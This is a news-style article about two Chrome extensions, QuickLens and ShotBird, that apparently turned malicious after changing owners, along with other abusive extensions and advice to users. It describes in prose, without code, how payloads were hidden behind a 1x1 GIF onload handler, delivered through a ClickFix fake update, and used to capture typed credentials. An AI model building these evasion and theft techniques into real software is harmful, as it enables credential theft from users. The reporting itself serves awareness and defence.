Google Chrome Extensions Turn Malicious in Supply Chain Attack: Users Warned of Data Theft and Malware Risks

In a concerning development for Chrome users worldwide, two once-legitimate Google Chrome extensions have been weaponized in what appears to be a coordinated supply chain attack, putting thousands of users at risk of data theft, malware infection, and privacy breaches.

The malicious extensions in question are QuickLens – Search Screen with Google Lens and ShotBird – Scrolling Screenshots, Tweet Images & Editor. These seemingly harmless browser tools have been transformed into dangerous malware delivery mechanisms following ownership transfers to unknown threat actors.

QuickLens, which boasted approximately 7,000 users before being removed from the Chrome Web Store, and ShotBird, still available with around 800 active users, were originally developed by an individual known as Akshay Anu S (@AkshayAnuOnline). The developer had marketed QuickLens as a productivity tool while claiming ShotBird could create “professional, studio-like visuals” with all processing happening locally on users’ devices.

However, the situation took a dark turn when both extensions changed hands. QuickLens was listed for sale on ExtensionHub just two days after its initial publication in October 2025, eventually falling under the control of a new owner identified as “[email protected]” on February 1, 2026. ShotBird similarly transferred ownership to “[email protected]” in January 2025, shortly after receiving a “Featured” badge from the Chrome Web Store.

The malicious updates introduced to these extensions represent a sophisticated evolution in browser-based attacks. Security researchers discovered that the compromised QuickLens extension implemented a clever technique to bypass security measures. The malicious code never appears in the extension’s source files, making traditional static analysis ineffective. Instead, the extension polls an external command-and-control server every five minutes, receiving JavaScript payloads that are stored in the browser’s local storage.

These payloads are then executed through a deceptive mechanism: the extension creates a hidden 1×1 pixel GIF element and sets the malicious JavaScript as its “onload” attribute. Once the image loads, the harmful code executes, giving attackers remote control over affected browsers.

The ShotBird extension employs a similar but slightly different approach, using direct callbacks to deliver JavaScript code. This code displays a fake Google Chrome browser update prompt. When unsuspecting users click to “update,” they’re redirected to a ClickFix-style page that opens the Windows Run dialog, launches “cmd.exe,” and pastes a PowerShell command. This chain of events results in the download of an executable named “googleupdate.exe” on Windows systems.

Once installed, this malware exhibits extensive capabilities that extend far beyond simple data collection. The malicious software hooks into HTML input elements, textareas, and select fields, capturing everything users type—including credentials, PINs, credit card details, authentication tokens, and government identification numbers. Additionally, it siphons data stored within the Chrome browser itself, such as saved passwords, browsing history, and information about installed extensions.

Security experts emphasize that this represents a “two-stage abuse chain” combining extension-side remote browser control with host-level execution. The implications are severe: what began as a browser-only abuse scenario has escalated to potential credential theft and broader endpoint compromise.

The sophistication of this attack is evident in its execution. Researchers note that the malicious extensions maintain their original functionality, making detection difficult for average users. The code is designed to strip security headers like X-Frame-Options from HTTP responses, allowing injected scripts to make arbitrary requests to other domains while bypassing Content Security Policy protections.

This incident highlights a growing trend in cyber threats: the weaponization of legitimate software through ownership transfer. The original developer, who had published multiple extensions under their name—all receiving “Featured” badges—appears to have sold these tools to malicious actors. The developer’s presence on ExtensionHub and attempts to sell domains like “AIInfraStack.com” for $2,500 suggest a pattern of monetizing digital assets without regard for their ultimate use.

The Chrome Web Store’s verification system, which granted “Featured” status to these extensions, has come under scrutiny. While the store’s review process may catch obvious malicious code, it cannot prevent bad actors from acquiring legitimate extensions and pushing updates containing hidden threats. This supply chain vulnerability represents a significant challenge for platform security.

Industry analysts warn that this attack is part of a broader trend affecting browser extensions across platforms. Microsoft recently issued warnings about malicious Chromium-based extensions masquerading as legitimate AI assistant tools to harvest LLM chat histories and browsing data. These extensions, appearing as trusted productivity tools, have become persistent data collection mechanisms embedded in enterprise environments.

The threat extends beyond data theft. Other malicious extensions identified by security researchers include lmToken Chromophore, which impersonates the legitimate imToken cryptocurrency wallet while stealing seed phrases through phishing redirects. Another dangerous extension, Chrome MCP Server – AI Browser Control, poses as an AI automation tool but functions as a full-fledged remote access trojan using the Model Context Protocol.

Even extensions that appear to return to the Chrome Web Store after being flagged for malicious behavior pose ongoing risks. Security researchers discovered that extensions like Urban VPN Proxy, Urban Browser Guard, and Urban Ad Blocker, previously identified for scraping AI conversations, had been updated with benign versions following public disclosure of their activities.

The scope of malicious browser extensions is staggering. Unit 42 researchers identified over 30,000 domains involved in a campaign distributing the OmniBar AI Chat and Search extension, which uses the chrome_settings_overrides API to alter browser settings, change home pages, and modify default search providers. This appears to be part of a large-scale affiliate marketing scheme, with similar behavior observed in extensions like AI Output Algo Tool and Serpey.com official extension.

Some extensions engage in more subtle forms of abuse, tracking user browsing activity to inject affiliate markers or extracting and transmitting user Reddit comment threads to developer-controlled API endpoints. Extensions like Care.Sale, Giant Coupons Official Extension, and Consensus – Reddit Comment Summarizer demonstrate how seemingly useful tools can serve as data collection mechanisms.

For users who may have installed these compromised extensions, immediate action is essential. Security experts recommend removing any suspicious extensions from browsers without delay. Users should avoid side-loading or installing unverified productivity extensions, regularly audit browsers for unknown extensions, and uninstall anything that seems unfamiliar or unnecessary.

This incident serves as a stark reminder of the risks inherent in our increasingly connected digital ecosystem. As browser extensions become more sophisticated and integrated into our daily workflows, they also become more attractive targets for malicious actors. The convenience they offer must be weighed against the potential for abuse, and users must remain vigilant about the permissions they grant and the sources from which they install software.

The Chrome extension supply chain attack represents a new frontier in cybersecurity threats, where the line between legitimate and malicious software becomes increasingly blurred. As attackers continue to evolve their techniques, users, developers, and platform providers must work together to establish more robust security measures and verification processes to protect against these sophisticated threats.

ChromeExtensions #Malware #DataBreach #Cybersecurity #SupplyChainAttack #BrowserSecurity #GoogleChrome #ExtensionMalware #CyberThreat #OnlineSafety #DataTheft #MaliciousExtensions #TechSecurity #PrivacyBreach #BrowserHijacking #ClickFix #CommandAndControl #ExtensionHub #DigitalSecurity #CyberAttack #ExtensionSecurity #OnlinePrivacy #MalwareAlert #TechNews #SecurityBreach #BrowserExtension #DataProtection #CyberCrime #ExtensionVulnerability #SecurityWarning

Viral Phrases:

• “Your browser is under attack”
• “Extensions turned evil”
• “Click and regret”
• “The hidden danger in your browser”
• “When good extensions go bad”
• “Browser backdoor unlocked”
• “Digital wolves in sheep’s clothing”
• “The extension that betrayed you”
• “Malware masquerading as productivity”
• “Your data, their playground”
• “The silent browser invasion”
• “Chrome compromise catastrophe”
• “Extension exploitation exposed”
• “Browser betrayal: The new normal”
• “From helpful to harmful in seconds”
• “The extension you can’t trust”
• “Digital deception at its finest”
• “When convenience becomes compromise”
• “The malware you invited in”
• “Browser security: Broken beyond belief”
• “The extension supply chain nightmare”
• “Your privacy, their profit”
• “The click that cost you everything”
• “Browser-based backdoors”
• “The hidden cost of free extensions”
• “When ‘Featured’ means ‘Compromised'”
• “The extension that watches everything”
• “Digital danger disguised as help”
• “Browser betrayal: It’s happening now”
• “The malware delivery system you trusted”

,